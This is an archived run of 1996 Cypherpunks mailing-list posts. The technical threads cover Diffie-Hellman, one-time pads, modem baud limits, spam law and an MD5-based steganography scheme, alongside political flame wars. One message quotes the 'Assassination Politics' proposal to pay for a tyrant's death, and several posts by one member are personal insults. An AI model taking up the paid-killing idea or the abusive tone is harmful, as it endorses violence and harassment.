exponentiation and logs are each others inverse functions, and 
somehow this becomes a one way function in a finite field.

3. Are the Galois fields used in Diffie Hellman specially constructed 
in any way or are they just normal GF????

Thanks for any help anyone can give me....


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 09:28:28 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <323D6B95.7BC9@tivoli.com>
Message-ID: <mH4cuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally <m5@tivoli.com> writes:

> jbugden@smtplink.alis.ca wrote:
> > 
> 
> > A social safety net is simply a form of health and life > insurance.
> 
> And a really neat-o form it is, too!  All it takes is an armed force
> to coerce the unwilling into paying the premiums of those who don't
> pay their own.

Yeah, and Social Security is a retiremend fund.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 09:46:12 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <199609161427.QAA05854@basement.replay.com>
Message-ID: <8L4cuD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@replay.com (Anonymous) writes:
>    Tim is not productive. He *was* productive, but not anymore; his wealth
Tim has no life. That's why he posts lies, personal attacks, and flame bait
to this mailing list and drives away and and all crypto discussion.
> > In most societies this is considered the difference between a child and
> > an adult...
> 
>    This is a silly statement of the kind often made by people who have no
> solid grasp of history or social organization: most societies that
> radically differ from our own in their ways of maintaining/supervising
> their members (successful or not) have apparatuses so invasive and
> arbitrary that, in comparison, the IRS and assorted other bureaucracies
> look pretty benign.
Yes - he's a typical mediocre product of the U.S. public education system.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Tue, 17 Sep 1996 09:53:26 +0800
To: cypherpunks@toad.com
Subject: Unsolicited email advertising already illegal in US?
Message-ID: <199609162154.OAA08632@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This piece from RISKS looks interesting.  My computer certainly _is_

    "equipment which has the capacity to transcribe text or images
    (or both) from an electronic signal received over a regular
    telephone line onto paper."

Now, are HipCrime et al. liable for $500 in damages for each piece of spam?
If so, where do I sign up?

   - Ian

- ---8<---8<---
Date: Thu, 12 Sep 1996 19:46:42 -0400
From: Dan Franklin <dan@copernicus.bbn.com>
Subject: Sometimes junk e-mail is already a fax, legally speaking

I've been using the following legal information, which I picked up from
another mailing list (Keith Bostic's /dev/null list), in my responses to
junk e-mail these days.  So far I haven't yet received junk e-mail on my
home computer while it had a printer attached, but one of these days...

Under US Code Title 47, Sec.227(b)(1)(C):
 
        "It shall be unlawful for any person within the United States to
         use any telephone facsimile machine, computer, or other device
         to send an unsolicited advertisement to a telephone facsimile
         machine"

A "telephone facsimile machine" is defined in Sec.227(a)(2)(B) as:

        "equipment which has the capacity to transcribe text or images
         (or both) from an electronic signal received over a regular
         telephone line onto paper."

Under this definition, an e-mail account, modem, computer and printer
together constitute a fax machine.

The rights of action are as follows.  Under Sec.227(b)(3)(B):

        "A person or entity may, if otherwise permitted by the laws or
         rules of court of a State, bring in an appropriate court of
         that State --

          (A) an action based on a violation of this subsection or the
              regulations prescribed under this subsection to enjoin
              such violation,
          (B) an action to recover for actual monetary loss from such a
              violation, or to receive $500 in damages for each such
              violation, whichever is greater, or
          (C) both such actions. If the court finds that the defendant
              willfully or knowingly violated this subsection or the
              regulations prescribed under this subsection, the court
              may, in its discretion, increase the amount of the award
              to an amount equal to not more than 3 times the amount
              available under subparagraph (B) of this paragraph."

For the full legal text USC Title 47, Section 227, see:
http://www.law.cornell.edu/uscode/47/227.html

Dan Franklin  dfranklin@bbn.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj3MlEZRiTErSPb1AQFSIgP/SKn68eix0cgOMa2QgOsAJ7IePBZitECs
1KflgL0ziSW9D5JBhYmjAfl3UoFF7UJ1vyROFUV7sgBB1PSXGAvBGycSqrIhciPh
Fm/73HUT0pr4foyTAPOndhAOx3ls61+kT497TUx+BecPhtfI41Mu0zTdPaZdWogP
vaxfu97SuWw=
=OC/R
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 09:16:35 +0800
To: cypherpunks@toad.com
Subject: RE: Workers Paradise. /Political rant.
In-Reply-To: <ae62ca2b020210047319@[207.167.93.63]>
Message-ID: <4R4cuD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> I have never argued against insurance! People who wish to buy insurance are
> welcome to, obviously.

Tim doesn't understand the difference between a private insurance participation
in which is voluntary (most life insurance in the U.S., most retirement
savings plans) and a government-mandated scam like Social Security.

I fart in your general direction.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 09:39:59 +0800
To: cypherpunks@toad.com
Subject: Re: IBM_gak
In-Reply-To: <Pine.3.89.9609160910.A7964-0100000@netcom14>
Message-ID: <eg5cuD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green <shamrock@netcom.com> writes:
> Aparently, Al Gore's recent phone calls to everybody who is anybody in the 
> industry have paid off. After HP, TIS, and other unnamed parties, now IBM 
> is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to 
> a PKI near you.

Apparently, senile Tim May (fart) is a Clinton administration troll planted
here to sabotage any discussions of actual crypto work and to flood this
mailing list with lies and personal attacks and to make it unusable.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Wagner <daw@cs.berkeley.edu>
Date: Tue, 17 Sep 1996 09:59:16 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <Pine.3.89.9609152124.A20702-0100000@netcom9>
Message-ID: <199609162254.PAA05380@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.3.89.9609152124.A20702-0100000@netcom9>,
Lucky Green  <shamrock@netcom.com> wrote:
> On Sun, 15 Sep 1996, Dale Thorn wrote:
> > Just a comment: "The world population really should go back to around 
> > one billion", etc. And how could we achieve that without severe govt. 
> > oppression, one wonders?
> 
> Quite simple. End all food and medical aid to developing countries paid 
> for with money stolen at gunpoint from our citizens. Or make Norplant 
> implants the condition for financial/in kind aid. Both US and 
> abroad.

Why stop there?

Make biometric ID implants the condition for welfare and financial aid, so
we can track them in case they spend it on (gasp!) donations to the Libertarian
party.

Government scholarships for education and research?  Better wiretap their
phones & emails, in case the recipients use the scholarships to work on strong
non-GAKed cryptography.

Hell, folks are also taking advantage of government money every time they
step foot on a park or government road: might as well require citizen-units
to escrow their identity and confiscate their guns as a condition of usage.

``Buckle your thought-escrow-unit, it's the law!''




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 17 Sep 1996 10:09:50 +0800
To: m5@tivoli.com
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <9608168429.AA842914706@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:
> By spreading the risk you minimize the cost.

m5@tivoli.com wrote:
>Yea right.

Actually, yes. 

Canada has a single payer system and we spend about two thirds as much as the
U.S. on health care as a percentage of G.N.P. We manage to insure all Canadians
while about 35% of people in the U.S. have *no* health insurance.

Yes, the insurance premium is not optional. Yes, it *is* cheaper.

Ciao,
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 17 Sep 1996 17:10:51 +0800
To: cypherpunks@toad.com
Subject: Re: Snake Oil FAQ 0.4 [comments appreciated]
Message-ID: <ae638e36030210045e9a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:06 AM 9/17/96, The Deviant wrote:

>Not to mention, the basic flaw of OTP.. if you have the only copy of the
>key, and the key is non-repetitive, how do you send the key to another
>person without being just as insecure as not encrypting it in the first
>place... almost any OTP claims are gonna be snake oil.

Not quite.

Many cryptographic messages have a *time value*. The canonical example is
"Attack at dawn." A one-time pad carried by a unit out onto the battlefield
is eminently valuable for receiving such time-critical messages.

Many other examples abound: embassies receiving instructions from the home
country, travelling businessmen exchanging messages with the office, Air
Force One receiving encrypted transmissions from NORAD, and so on.

This is why OTPs are still in use by the military, embassies, etc.

Granted, asymmetric key systems have various advantages, discussed here all
the time, but to say almost any OTP claims are snake oil is untrue. (Many
claims about OTPs _are_ of course snake oil, but usually in that they are
not true OTPs in the Shannon sense.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Tue, 17 Sep 1996 01:31:01 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems
Message-ID: <9609161402.AA11975@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Sep 16 15:59:53 1996
I think I have to throw in some words here, too:

1. BAUD is one distingushable signal form.
2. BPS is bits per second

3. NO transmission over a standard phoneline can have more than 3100 baud, 
because the frequency of anything transmitted over that line is band 
limited to 300hz - 3400hz. (If you have ISDN it's not relevant anyway, 
since you are fixed with 8000hz or 64000 bps->in europe :), 56000 bps in 
usa)

4. Most modern transmission schemes work with multiple bits per baud. I.e. 
you transmit 10 bits in one baud if you have a 31000 bps modem. the only 
limitation in transmission speed is the amount of binary values you can 
pack into one baud. that on the other hand is limited by the S/N (signal to 
noise) ratio of your line. If you have a noise of 0.9%, you can't use more 
than 100 steps or you have ambiguous signals. since people talk about 56000 
bps modems (we tried 34000 modems here and they couldn't produce more than 
28800 on a very good connection) that would mean, that you have to transmit 
18 bits = 262144 (!) distinguishable signal forms per baud.

Comments?

Remo Pini
 
- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMj1dWhFhy5sz+bTpAQHmVAgAqRHydyZdElXlwMSgdKB6hg1fDBCMfhia
JoI5W8n0JLcKe9HYN/H0DPqFHHDIATEhlN3b3OIhYCw52cNJ/e3b9Nbp5RQo+sDX
zAogz5wZiDV7EA/gL589lNQZ9VKHlgTYBLzu1tqyJ5cD2KhWEUjvXyN4lYuxcEQT
NIaiNPeYXrC0BeoLa/AE8mCrtu+7nhxy5HlSjDiu3lEYaVygKIPQHM3+Ljzq0jkq
bmbqJbTyZshos+5gxHyXLsbL8rkpST53YT4Z3clL6PCv1ntNGXtb/loWgIDallYJ
bHgfh/bAS5Utg7fpzuVNS8AJV8L2VLirScBd4Bq5RAXZxnoTVVQxOw==
=9JSI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Tue, 17 Sep 1996 11:01:56 +0800
To: cypherpunks@toad.com
Subject: Spam blacklist project
Message-ID: <9609162025.AA00550@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	The following idea just hit me. How about a server which
maintained a list of people who don't want to recive SPAM? The idea
being that email recpients who don't want SPAM send their email
address to the list. A SPAMer who want to check an email to see
if it is on the list could then obtain the SHA-Digested list of
addresses and remove them from their internal databases.

	Of course I don't for a moment imagine that this will
be 100% effective. Without government regulation there will
always be slimeballs who send mail to people who don't want it.

	The advantage of this scheme is that it would mean that
the spam industry can avoid regulation pressure and they can
deflect criticism. Meanwhile recipients of unwanted spam have 
a legitimate beef.

	Comments?

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 17 Sep 1996 02:47:28 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <ae61f6ec05021004f2e5@[207.167.93.63]>
Message-ID: <199609161427.QAA05854@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim McCoy wrote:

> Anonymous wrote:
> >Tim May wrote:
> >
> >> The thing about _traditional_ charity, of the religious or community sort,
> >> was that it was not treated as an "entitlement," as something the resentful
> >> masses could "demand" as part of their "human rights."
> >
> >   There's no substantial difference between their resentful whining about
> >their rights and your resentful whining about your rights - except maybe
> >that you whine more.
> 
> Actually there is a fundemental difference:  what Tim demands is the
> right to be left alone and to be free from exernal influence as long
> as what he is doing does not directly hurt another, what "they" demand
> is to be taken care of by others because they either cannot or choose not
> to take care of themselves.  The latter requires that someone productive
> (like Tim) be forced to take care of them through taxation or otherwise
> at gunpoint.

   Tim is not productive. He *was* productive, but not anymore; his wealth
might be productive in some indirect way, but it it certainly severable
from him. He demands to be left alone by certain socio-economic
apparatuses (socialized welfare) but is quite content to rely on the
existence of other such apparatuses (investment entities, banks). Whether
*that* is "hypocritical" doesn't interest me; I merely pointed out that he
is constantly and resentfully whining about his own "rights" and about
others' lack thereof--in that regard, he's of a kind with the people he is
forever griping about.

> In most societies this is considered the difference between a child and
> an adult...

   This is a silly statement of the kind often made by people who have no
solid grasp of history or social organization: most societies that
radically differ from our own in their ways of maintaining/supervising
their members (successful or not) have apparatuses so invasive and
arbitrary that, in comparison, the IRS and assorted other bureaucracies
look pretty benign.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@suite.suite.com (Jim Miller)
Date: Tue, 17 Sep 1996 13:24:56 +0800
To: cypherpunks@toad.com
Subject: really undetectable crypto made somewhat practical
Message-ID: <9609162334.AA17481@suite.com>
MIME-Version: 1.0
Content-Type: text/plain



The primary drawback to the stego scheme I described in the previous post  
was the ratio of stego bits per message.  The scheme would only transmit  
an estimated 4 stego bits per message.  Then it occurred to me that I can  
improve the ratio by basing the scheme on the hashes or words rather than  
the hashes of entire messages.

Previous Scheme:  construct a sequence of plaintext messages such that the  
first 4 bits of the MD5 hashes of the messages combine to produce the  
cyphertext of the true stego message.  The sender would only need to send  
the plaintext messages.  The recipient would calculate the MD5 hash of  
each plaintext message, extract the first four bits from each hash, append  
them together, then decrypt the result to obtain the true stego message.

New Scheme:  First, calculate the MD5 hash of all the words in the various  
dictionary files used by the password cracker program and create a  
database containing every word and the first 4 bits of its MD5 hash.   
Given such a database, it would be possible to write a program that  
accepts as input a block of cyphertext (the stego message, encrypted),  
chunks it up in to groups of 4 bits and then, for each chunk, displays the  
words that have hashes that start with those same four bits.  The person  
running the program would select words that form meaningful sentences but  
also produce hashes that combine into the encrypted stego message.  This  
scheme would send 4 stego bits per word.

In addition to ordinary words, the database could contain names,  
misspelled words, abbreviations, words with alternate capitalization,  
slang terms, technical jargon, whatever.

Fortunately, senders and receivers don't need to synchronize word  
databases.  The recipient doesn't need to have any word database.  The  
receiver can reconstruct the hidden encrypted message simply by  
calculating the MD5 hash of each word in the plaintext message, gathering  
up the appropriate hash bits and decrypting the result.

This scheme could send more than 4 stego bits per word, but as you  
increase the number of stego bits per word (sbpw), you reduce the number  
of words that will work for a given chunk of cyphertext, making it harder  
to construct meaningful sentences (e.g. given a 40,000 word database, 4  
sbpw yields 16 word groups with approx 2500 words per group; 8 sbpw yields  
256 word groups with approx 156 words per group.  8 sbpw would probably  
not work well).

Would this scheme work?  It works in the sense that you can use it to send  
arbitrary encrypted messages through channels that don't allow anything  
but human-readable plaintext messages, but does it do so in an  
undetectable manner?  I think so, but I don't know for sure.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 17 Sep 1996 03:17:24 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <199609160641.AAA23324@InfoWest.COM>
Message-ID: <199609161433.QAA06393@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


attila:

> = .   There's no substantial difference between their resentful whining about
> = .their rights and your resentful whining about your rights - except maybe
> = .that you whine more.

   [silly remarks about crapping, watermelons, and hypocrites deleted]

>         I'm not whining about it my rights any more than Tim is 
>     whining about his.  One of the principals of the American 
>     Revolution was NO TAXATION WITHOUT REPRESENTATION. When our     
>     government takes my money and creates a new class which "votes"
>     to require me to pay for them; they are a vested interest voting
>     only for their own gain without my consent.

   My full remarks are above; I never defended the present system.

>         human rights are supposedly universal.  however, since when 
>     has an entitlement been considered a "human right?"

   Never, AFAIK.

>         are you playing the part of the bleeding knee-jerk welfare 
>     advocate?  The type: "I'm willing to give mine, (but I cheat on 
>     my taxes) --just make sure you let the Feds extort their welfare 
>     system from _your_ profits.

   No.

>         charity is man's _benevolence_  and, there is nothing in the
>     scriptures which says the lazy and resentful are _entitled_ to
>     my support.  

   Charity has many definitions; in the Judeo-Christian tradition,
benevolence is not a prominent one. Nor are sawed off accusations of
laziness and resentfulness very indicative of caritas, OTOH.

>         I tithe, and tithe faithfully; and contribute a fast offering 
>     every month for the ward bishop's fund.  as in says in the 
>     scriptures, he who faithfully tithes shall receive it tenfold.
>     we take care of our own community, and we don't collect welfare.
> 
>         it works.

   That is an excellent thing, and you should do it regardless of returns;
we all should. I do.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Tue, 17 Sep 1996 11:18:12 +0800
To: cypherpunks@toad.com
Subject: Re: Kiddie porn on the Internet
In-Reply-To: <199609162001.NAA21875@mail.pacifier.com>
Message-ID: <9609162033.AA32637@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Yet another obligatory AP (Assassination Politics) reference:  If a person 
>is really interested in helping out "starving children" he may be able to do 
>far more good by purchasing the death of the local tyrant(s), rather than 
>(just) buying more food.


The problem is that assasination rarely leads to the installation of
a government that is any better. In most cases it gets worse.

In the past the US excuse for supporting bloodthirsty murderers like
Pinochet, Saddam, Marcos and Noriega was that the alternative was
worse.

In cases like Eritrea or Ethiopia the average term of office of any 
given despot tends to be rather short in any case. In most cases its
a case of there being little to choose between the leaders of the 
various factions and that ending the war on any terms is better 
than allowing it to continue. 


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Gairson <erp@digiforest.com>
Date: Tue, 17 Sep 1996 13:32:29 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: 56 kbps modems
In-Reply-To: <9609161402.AA11975@srzts100.alcatel.ch>
Message-ID: <Pine.LNX.3.91.960916162806.11964A-100000@digital.digiforest.com>
MIME-Version: 1.0
Content-Type: text/plain


I personally, am not much for this, I am just one with various ideas, and 
questiosn and such, so here goes.

On Mon, 16 Sep 1996, Remo Pini wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Mime-Version: 1.0
> Content-Type: text/plain
> Content-Transfer-Encoding: 7bit
> 
> To: cypherpunks@toad.com
> Date: Mon Sep 16 15:59:53 1996
> I think I have to throw in some words here, too:
> 
> 1. BAUD is one distingushable signal form.
> 2. BPS is bits per second

Ok, I agree with those.

> 
> 3. NO transmission over a standard phoneline can have more than 3100 baud, 
> because the frequency of anything transmitted over that line is band 
> limited to 300hz - 3400hz. (If you have ISDN it's not relevant anyway, 
> since you are fixed with 8000hz or 64000 bps->in europe :), 56000 bps in 
> usa)

Personally, by saying that no transmission on a standard phoneline can 
have more than 3100 baud, is a statement saying that technology and 
science, shall never advance, to a point where things are possible.
If you remember right, just 10 or so years ago, we stated that 2400 baud 
was the highest possible baud, and we would never go over.  My modem, 
running on a standard phone line, is a 28.8 USRobotics modem, with 
the software, and hardware upgrades to a 3400 baud, I get on an average 
day anywhere from 3500 to 3600 baud for send/receive.  On a bad day, I 
only get 3100 to 3200.  SO I would say, that my phone lines, are cleaner 
than most eh?  And Yes, I am in the US.
Speaking of ISDN, how many people, can afford to have a personal ISDN 
line in there house?  And then afford to connect to something/someone 
else on a next to permanent basis monthly?

> 
> 4. Most modern transmission schemes work with multiple bits per baud. I.e. 
> you transmit 10 bits in one baud if you have a 31000 bps modem. the only 
> limitation in transmission speed is the amount of binary values you can 
> pack into one baud. that on the other hand is limited by the S/N (signal to 
> noise) ratio of your line. If you have a noise of 0.9%, you can't use more 
> than 100 steps or you have ambiguous signals. since people talk about 56000 
> bps modems (we tried 34000 modems here and they couldn't produce more than 
> 28800 on a very good connection) that would mean, that you have to transmit 
> 18 bits = 262144 (!) distinguishable signal forms per baud.
> 
> Comments?

What about new ways of splitting the steps and baud more so that it shows 
less at a higher level....  Just a question..  Ahh well, I'm getting a 
page so I shall finish this now...  Answer appreciated..

> 
> Remo Pini
>  
> - ------< fate favors the prepared mind >------
> Remo Pini                        rp@rpini.com
> PGP:  http://www.rpini.com/crypto/crypto.html
> - ----< words are what reality is made of >----
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3i
> Charset: noconv
> 
> iQEVAwUBMj1dWhFhy5sz+bTpAQHmVAgAqRHydyZdElXlwMSgdKB6hg1fDBCMfhia
> JoI5W8n0JLcKe9HYN/H0DPqFHHDIATEhlN3b3OIhYCw52cNJ/e3b9Nbp5RQo+sDX
> zAogz5wZiDV7EA/gL589lNQZ9VKHlgTYBLzu1tqyJ5cD2KhWEUjvXyN4lYuxcEQT
> NIaiNPeYXrC0BeoLa/AE8mCrtu+7nhxy5HlSjDiu3lEYaVygKIPQHM3+Ljzq0jkq
> bmbqJbTyZshos+5gxHyXLsbL8rkpST53YT4Z3clL6PCv1ntNGXtb/loWgIDallYJ
> bHgfh/bAS5Utg7fpzuVNS8AJV8L2VLirScBd4Bq5RAXZxnoTVVQxOw==
> =9JSI
> -----END PGP SIGNATURE-----
> 



Erp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 17 Sep 1996 18:24:58 +0800
To: Rabid Wombat <cypherpunks@toad.com
Subject: Re: Forwared message from Pres. of juno.com
Message-ID: <ae6394ee04021004f2d6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:55 AM 9/17/96, Rabid Wombat wrote:

>---------- Forwarded message ----------
>Date: Fri, 13 Sep 1996 15:25:58 -0400
>From: Charles Ardai <charles@staff.juno.com>
>To: Rabid Wombat <wombat@mcfeely.bsfs.org>
>Subject: Annoying spam incident(s)
                   ^^^^
>> Complaints about spamming and cross-posting probably won't get you far,
                    ^^^^^^^^

>A couple of clarifications: Juno has never sent a single piece of spam and,
                                                                   ^^^^
...

And so on, with the word "spam" being used frequently throughout the exchange.

Now, correct me if I'm wrong, but I don't recall seeing _any_ "spam" from
the account holders at Juno. What I _do_ recall is one or more young kids
signed up to our list and then began engaging in posting to the list
various boring comments about their interests, their "warez," and so on.

Stupid comments are not necessarily (or even usually) spam.

When we start calling stupid postings "spam" and complaining to sysadmins
about "spamming" by a user, we have seriously devalued any use the term
might have once had. This applies whether the stupid posts are from
"talker" or from _me_.

We have an open mailing list, with anyone able to subscribe via majordomo.
This means we'll get inexperienced users, flamers, and, yes, even true
commercial spammers who use the open-reflector nature of the list to post
their ads.

(By the way, when various political organizations, e.g., EPIC, the
Libertarian Party, EFF, VTW, etc., use this open-posting feature, is this
also to be called "spamming"? Why is an alert to dozens of mailing lists
and newsgroups not spam, while "Buy Wheaties" _is_ spam? The answer is that
spam is in the eye of the beholder, and the law should not attempt to
decide which "unrequested messages" are OK and which are not.)

Some suggestions:

-- if people want a closed list, use a version of list software that only
allows members to post

-- if people want "levels" of expertise involved, a la "29th Level
Cypherpunk," this is not the place and time to try to implement this

-- use filters, e.g., procmail, Eudora, whatever

-- don't refer to unwanted posts as "spam," as this invites talk of
applying laws about spam

-- as always, use technology and related tools (filters, reputations)
whenever possible instead of laws and the threat of laws

The sooner we move to a system where people make positive decisions about
which messages to accept and which not to, the better. This is a
technological effort--seeking to influence the direction mail takes--worthy
of some serious thinking, in my view.


--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Luke Smith <lksmith@perseus.peganet.com>
Date: Tue, 17 Sep 1996 11:09:51 +0800
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Excite Live!
In-Reply-To: <01I9EA0TKKDS9ULOQC@mbcl.rutgers.edu>
Message-ID: <Pine.BSD/.3.91.960916165906.7269B-100000@perseus.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Sep 1996, E. Allen Smith wrote:

> From:	IN%"live@excite.com" 11-SEP-1996 22:14:03.06
> 
> >A request was made for the location of your Excite Live! page
> 
> >Found your Excite Live at URL
> >http://live.excite.com/?uid=CEC8C99632372D6E
> 
> 	Hi. As you can see from the above, I've set up an Excite Live!
> page up with the email address of cypherpunks@toad.com. It has top priority
> on things related to cypherpunks, including technology news, political news,
> international news, etcetera, plus some build-in links and searches to
> appropriate places. I'd advise using the anonymizer to access the above
> link (http://www.anonymizer.com:8080/http://live.excite.com/?uid=).
> 	-Allen
> 
well i dunno about that but
HTTP://WWW.BOMBNET.COM/CHAPTER9/
is the BEST web page I have ever visited! it has live chat <the filez YOU 
want> and even info! this site rocks!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Tue, 17 Sep 1996 09:46:05 +0800
To: cypherpunks@toad.com
Subject: Judge Kozinski Responds
Message-ID: <199609162121.RAA24934@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Sep 16 17:18:36 1996
cypherpunks:

I have been having a private e-mail conversation with Judge Alex Kozinski of 
the 9th circuit. Today he said:

>Jim:  Feel free to clarify my position to your comrades
>(excuse the term) if you think it will be useful.  I guess
>I'll keep thinking about this stuff and may change my mind
>on some things.

...

In a previous message to me in response to cypherpunks messages mentioning 
him which I forwarded, he said:

>The statement about anonymous remailers was largely
